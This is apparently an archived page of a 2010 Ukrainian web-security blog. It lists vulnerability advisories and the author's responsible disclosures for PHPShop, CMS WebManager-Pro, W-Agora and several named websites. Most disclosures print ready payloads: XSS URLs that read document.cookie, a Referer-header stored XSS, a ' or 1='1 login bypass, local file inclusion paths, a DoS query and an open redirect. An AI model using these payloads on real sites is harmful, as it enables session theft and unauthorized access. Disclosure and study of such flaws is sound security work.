Архів для категорії 'Уразливості'

Добірка уразливостей

22:35 06.11.2010

В даній добірці уразливості в веб додатках:

  • New lighttpd packages fix denial of service (деталі)
  • MantisBT “Add Category” Script Insertion Vulnerability (деталі)
  • ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability (деталі)
  • Novell ZENworks Asset Management docfiledownload Remote SQL Injection Vulnerability (деталі)
  • SQL injection vulnerability in BXR (деталі)
  • XSS vulnerability in Prado Portal (деталі)
  • F2L-3000 files2links SQL Injection Vulnerability (деталі)
  • XSS vulnerability in DT Centrepiece (деталі)
  • XSS vulnerability in DiamondList (деталі)
  • Cisco IOS XR Software SSH Denial of Service Vulnerability (деталі)

Уразливості в PHPShop

15:04 06.11.2010

08.09.2010

У квітні, 18.04.2010, я знайшов Insufficient Anti-automation, Cross-Site Scripting, Denial of Service та Full path disclosure уразливості в PHPShop (це движок для онлайн магазинів). Дані уразливості я виявив на сайті bezpeka.kr.ua. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

06.11.2010

Insufficient Anti-automation:

http://site/users/register.html

На даній сторінці використовується уразлива капча.

PHPShop CAPTCHA bypass.html

http://site/users/sendpassword.html

На даній сторінці немає захисту від автоматизованих запитів (капчі).

XSS (з обходом капчі):

PHPShop XSS.html

DoS:

http://site/search/?words=.&p=all&cat=0

Full path disclosure:

http://site/page/’

Уразливі PHPShop 2.1 EE та попередні версії (й потенційно наступні версії).

Уразливість на letitbit.net

15:07 05.11.2010

17.02.2010

У липні, 12.07.2009, я знайшов Cross-Site Scripting уразливість на проекті http://letitbit.net (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

05.11.2010

XSS:

Дану уразливість вже виправили. Але зробили це некоректно, тому при невеликій зміні коду, вона знову працює.

XSS:

Добірка уразливостей

15:06 04.11.2010

В даній добірці уразливості в веб додатках:

  • HP Web Jetadmin, Remote Unauthorized Access to Data, Denial of Service (DoS) (деталі)
  • YACK CMS 10.5.27 Remote File Inclusion Vulnerability (деталі)
  • OpenSSL vulnerability (деталі)
  • EasyManage CMS Multiple SQL injection Vulnerabilities (деталі)
  • XSS vulnerability in Campsite (деталі)
  • XSS vulnerability in Campsite (деталі)
  • 68KB v1.0.0rc4 Remote File Include Vulnerability (деталі)
  • Geo++(R) GNCASTER: Faulty implementation of HTTP Digest Authentication (деталі)
  • Geo++(R) GNCASTER: Insecure handling of NMEA-data (деталі)
  • Geo++(R) GNCASTER: Insecure handling of long URLs (деталі)

XSS та SQL Injection в CMS WebManager-Pro

19:15 30.10.2010

28.07.2010

У липні, 02.07.2010, а також додатково сьогодні, я знайшов Cross-Site Scripting та SQL Injection уразливості в CMS WebManager-Pro. Дані уразливості я виявив на різних сайтах на CMS WebManager-Pro від FGS_Studio. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS WebManager-Pro.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

30.10.2010

XSS:

http://site/index.php?word[]=%22%20onMouseOver=alert(document.cookie)%20

Дана уразливість може використовуватися разом з MouseOverJacking.

SQL Injection (Authentication Bypass):

На сторінці http://site/admin/ при відключенних mq:
' or 1='1В полі Логин.

Уразливі CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.

Уразливості на www.rccc.org

16:15 29.10.2010

22.02.2010

У липні, 06.07.2009, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://www.rccc.org. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.10.2010

XSS (Remote XSS Include):

http://www.rccc.org/common/group.asp?url=javascript:alert(document.cookie)

Redirector (Remote HTML Include):

http://www.rccc.org/common/group.asp?url=http://websecurity.com.ua

Дані уразливості вже виправлені шляхом видалення уразливого веб додатку.

Добірка уразливостей

22:39 28.10.2010

В даній добірці уразливості в веб додатках:

Уразливість на kinozalka.com

15:07 28.10.2010

10.02.2010

У червні, 29.06.2009, я знайшов Cross-Site Scripting уразливість на проекті http://kinozalka.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

28.10.2010

XSS:

На cторінках сайта http://kinozalka.com в блоці “У нас искали” через поле Referer. Це persistent XSS уразливість.

Referer: http://www.google.com/search?q=xss"><script>alert(document.cookie)</script>

Дана уразливість не була виправлена адміном. І як я сьогодні виявив, він закрив свій сайт і зараз даний домен використовується PPC-шниками для заробляння на кліках.

XSS та LFI уразливості в W-Agora

15:21 27.10.2010

29.08.2010

У серпні, 27.08.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я також виявив на сайті maidan.org.ua, як і попередні уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.10.2010

XSS:

http://site/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://site/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Уразливість працює в версії 4.1.5, але не працює в 4.2.1.

http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

В папці conf:

http://site/news/for-print.php3?bn=1

http://site/news/login.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/for-print.php3?bn=..\1

http://site/news/login.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи скрипти php3 мають розширення php. Якщо адміни maidan.org.ua виправили уразливості, то розробник системи дані уразливості не виправив (але після публікації попередніх дірок в багтреках, розробник схоже почав їх виправляти, як мінімум виправив зазначені XSS на офіційному сайті системи).

Добірка уразливостей

20:16 26.10.2010

В даній добірці уразливості в веб додатках:

  • PowerDNS Recursor up to and including 3.1.7.1 can be spoofed into accepting bogus data (деталі)
  • PowerDNS Recursor up to and including 3.1.7.1 can be brought down and probably exploited (деталі)
  • Critical PowerDNS Recursor Security Vulnerabilities: please upgrade ASAP to 3.1.7.2 (деталі)
  • PHPKIT WCMS - Multiple stored Cross Site Scripting Issues (деталі)
  • TTVideo 1.0 Joomla Component SQL Injection Vulnerability (деталі)
  • Novell Teaming ajaxUploadImageFile Remote Code Execution Vulnerability (деталі)
  • Joomla input sanitization errors (XSS) (деталі)
  • XSS vulnerability in Spitfire search (деталі)
  • XSS vulnerability in Spitfire (деталі)
  • LittleCMS vulnerabilities (OpenJDK, Firefox, GIMP, etc. impacted) (деталі)